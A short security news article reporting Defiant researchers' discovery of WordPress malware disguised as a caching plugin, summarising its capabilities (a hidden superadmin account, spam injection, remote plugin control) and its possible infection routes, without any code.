Cybersecurity researchers at Defiant recently discovered a new strain of malware that targets WordPress by masquerading as an optimization plugin.
The purpose of the malware, it was said, was to grant the attackers administrative access to the WordPress website.
While cleaning a website in the summer of 2022, the researchers discovered a plugin with a “professional-looking” opening comment about how it is a caching tool that helps reduce pressure on the server and shorten page load times. This choice, the researchers further explained, was purposeful to ensure that web administrators don’t suspect much upon manual inspection. Furthermore, the plugin is set to exclude itself from the list of active plugins, for the same purpose.
Monetizing compromised websites
The malware can do a number of things, including creating a ‘superadmin’ account with a hardcoded password; detecting bot traffic to serve them spam content (sometimes wrongly, causing a spike in spam reports from real users); replacing content on the site and inserting spam links or buttons (to everyone except site administrators, so they don’t realize what’s going on); checking plugins (remotely activating or deactivating plugins, erasing any traces of their existence, etc.); and remotely activating various malicious functions.
“Taken together, these features give attackers everything they need to remotely monitor and monetize a victim site at the expense of one’s own SEO rankings and user privacy,” the researchers explained their findings out.
Defiant did not name the threat actor currently spreading the malware or the estimated number of infected websites. We also don’t know exactly how the malware is distributed, but the researchers speculate that the attackers either brute force their way into WP websites and install the plugin, or use credentials stolen elsewhere in previous attacks. Then there is always the possibility that other vulnerable plug-ins are abused to gain access.
Through BleepingComputer